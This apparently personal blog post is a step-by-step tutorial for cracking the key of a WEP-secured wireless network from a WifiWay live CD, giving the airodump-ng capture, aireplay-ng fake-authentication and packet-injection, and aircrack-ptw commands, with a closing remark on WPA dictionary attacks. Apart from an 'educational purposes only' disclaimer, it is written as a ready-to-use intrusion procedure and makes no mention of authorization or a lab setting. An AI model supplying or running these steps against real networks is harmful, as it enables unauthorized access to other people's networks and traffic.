Lalit Kapoor

Disclaimer: This is for Educational purposes only. I am not responsible for how you or anyone else uses the following information. Check the laws in your country.

In order to hack a wireless network secured with WEP you will need a few tools:

• A wireless card that can go into monitor mode (I have an Intel PRO/Wireless 3945ABG)
  • Note: To do dump data and crack the key in Windows I would recommend OmiPeek Personal to capture the data (it will put your driver in monitor mode and restore it when you close the application) and the driver in the note below
  • Note: For my wireless card I needed to get an older driver. This older driver supports the much needed monitor mode. If you need this driver I have hosted it here. This is for Windows. However, this tutorial will teach you how to crack it in Linux via a Live CD.
• A linux live CD (I used: WifiWay version 1.0 Beta2 from here)
  • After booting up type in: startx
    • Note: All the text will be in Spanish. Go to the KDE menu and change the regional/language settings to English if you need to. Also in the taskbar in the bottom right change the flash from Spain’s flag to the U.S. flag if you desire to be able to use the US keyboard properly in the terminal.
• airodump-ng - To dump the packets to a file
• aireplay-ng - To increase the data packets
• airocrack-ptw - To crack the password

Now that you have all these tools you will need to do the following (Assuming you are using the WifiWay CD):

1. Type in a terminal: airodump-ng rtap0
2. Type in another terminal: airodump-ng -w packets rtap0 to start dumping the packets
3. Type in another terminal: ifconfig wifi0 up
4. Type: ifconfig to Get our MAC address
5. Type in another terminal: aireplay-ng -1 0 -a BSSID -h Our MAC -e ESSID wifi0 this is to do a handshake
6. Type: aireplay-ng -3 -b BSSID -e ESSID -h Our MAC wifi0 this is to inject more traffic (drive up the number of packets)
7. once you have alot of packets (over 250,000 is recommended for the highest possible bit wep key) type in aircrack-ptw packets.cap
8. Voila you have the key. It is in hex format.
9. If you need to do a hex to ascii coversion you can do it here.

Note: If you want to crack WPA, it is the same thing, except when you crack it, you will need to use a dictionary attack. If anyone really wants me to walk through this I will, just leave a comment.